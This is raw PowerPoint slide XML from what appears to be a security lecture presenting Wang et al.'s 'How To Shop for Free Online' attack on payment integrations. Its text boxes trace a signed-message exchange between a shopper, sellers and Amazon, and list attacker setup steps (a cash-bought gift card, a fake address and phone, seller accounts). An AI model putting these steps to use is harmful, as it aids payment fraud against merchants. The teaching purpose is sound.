        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Box 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662136AD-594F-3F49-95F4-AAA4C250027F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="708244">
            <a:off x="2520394" y="4567360"/>
            <a:ext cx="3582987" cy="441325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>communication about the payment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Box 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3543B866-B90C-A541-858E-6C490E2E79E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6700279" y="3531839"/>
            <a:ext cx="3060703" cy="1001713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Joint decision:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is an order appropriately paid?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C70CD2-5299-E043-AE1D-3B3719255B33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7826798" y="473317"/>
            <a:ext cx="3868367" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Wang et al. “How To Shop for Free Online”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250466843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74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6942BF2-6826-884D-AAA7-028C18B69C19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5476537" y="1517377"/>
            <a:ext cx="3767137" cy="4094163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19" descr="mastercard-giftcard2.JPG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2536C4C6-F9CE-8341-A7D4-D6F5973A45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8187" y="1872977"/>
            <a:ext cx="33480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F6D64312-D6B1-8A45-B73A-6B0A3CBA7B82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5678148" y="5752954"/>
            <a:ext cx="1609736" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(and seller Mark)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Oval Callout 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07D9C556-60AA-164C-896B-5828D24B02FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146461" y="2603227"/>
            <a:ext cx="2538412" cy="1146175"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -16950"/>
              <a:gd name="adj2" fmla="val 15257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sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jeff, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I want to buy this DVD.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117769" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8E2879A-FECE-EF4D-93D0-1E3D2E743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187" y="4827315"/>
            <a:ext cx="727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0" name="Picture 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C3D58D8-34A0-FC4D-BD4B-39F1EBA89D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4812" y="3636689"/>
            <a:ext cx="8397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71" name="Picture 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E62D8885-CB0F-A945-A000-A34C49FE97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8521" y="5464518"/>
            <a:ext cx="760412"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17ABFF51-DAB7-034E-963A-6B686E37AE13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6746536" y="4185965"/>
            <a:ext cx="2716212" cy="833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9A1CE1-6890-3941-BEEB-183B70B22F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="117771" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6719548" y="5346427"/>
            <a:ext cx="3278973" cy="49353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39E8D82-5E4E-8041-A8EA-EB88122457FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5735299" y="5482951"/>
            <a:ext cx="1546225" cy="338138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Shopper Chuck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662D7E85-CBB3-8546-BCDE-5D408DEE779A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8448345" y="5936947"/>
            <a:ext cx="1744663" cy="339725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Amazon (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>CaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FE2BA35-BF68-CF43-A030-B440FAF55101}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9742148" y="3316014"/>
            <a:ext cx="468398" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Jeff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" u="sng"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA7DB6B1-CBFC-3842-BE48-DF25E8B93CB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6636998" y="1607864"/>
            <a:ext cx="3494088" cy="2089150"/>
            <a:chOff x="5336275" y="1064525"/>
            <a:chExt cx="3493826" cy="2090383"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Oval Callout 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8209CFC5-A2F8-124F-8AE9-3CEF70BB01F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5336275" y="1064525"/>
              <a:ext cx="3493826" cy="2090383"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 14719"/>
                <a:gd name="adj2" fmla="val 81502"/>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sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Chuck, pay in Amazon with this signed letter: </a:t>
              </a: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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Folded Corner 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB3484AF-B603-1048-8BA0-74B8ACF23985}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5752169" y="1691957"/>
              <a:ext cx="2695373" cy="134858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tIns="182880" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Dear Amazon, </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>order#123 is $10, when it is paid, text me at 425-111-2222.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[Jeff’s signature]</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB2F46AC-4287-C34D-B889-2FFB3D162A66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6478249" y="2011090"/>
            <a:ext cx="3440113" cy="2185987"/>
            <a:chOff x="2784144" y="2715905"/>
            <a:chExt cx="3439236" cy="2185919"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Oval Callout 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD055BC-D68D-8841-ADBE-6AC1B1F956B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2784144" y="2715905"/>
              <a:ext cx="3439236" cy="2185919"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -20189"/>
                <a:gd name="adj2" fmla="val 1137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sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Amazon, I want to pay with this letter</a:t>
              </a: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a:p>
              <a:pPr algn="ctr">
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Folded Corner 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E5CCEB2-BB10-5E45-925D-F599ABBB4264}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3261814" y="3411941"/>
              <a:ext cx="2472521" cy="1255593"/>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tIns="91440" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Dear Amazon, </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:buFontTx/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>order#123 is $10, when it is paid, text me at 425-111-2222.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" strike="sngStrike" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" strike="sngStrike" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[Jeff’s signature] </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[Mark’s signature]</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Oval Callout 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7C07760-478A-CF4D-B8BB-A49A0D08405D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146461" y="4063726"/>
            <a:ext cx="3530600" cy="1270000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 57026"/>
              <a:gd name="adj2" fmla="val 65221"/>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sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hi, $10 has been paid for order#123. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [Amazon’s signature]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="Straight Connector 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AAED4C7-8E34-B04E-A2CE-B19949C11651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9875498" y="4390751"/>
            <a:ext cx="352425" cy="1138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Callout 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA5DC3F8-321D-2741-843C-36701DE8E9DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6367123" y="2330176"/>
            <a:ext cx="3492500" cy="877888"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49094"/>
              <a:gd name="adj2" fmla="val 143678"/>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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Great, I will ship order#123!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{710C5EB6-2CBD-D046-B584-EF2401F45E4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="573088" y="1935400"/>
            <a:ext cx="4851486" cy="3133725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2000" kern="0" dirty="0"/>
              <a:t>Anyone can be an online seller, even Chuck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2000" kern="0" dirty="0"/>
              <a:t>Purchase a $25 MasterCard gift card for cash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2000" kern="0" dirty="0"/>
              <a:t>Register under a fake address and phone number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="2000" kern="0" dirty="0"/>
              <a:t>Create seller accounts in PayPal, Amazon and Google using the card</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{042C4BE6-3249-0145-89F8-41FC7B24C699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
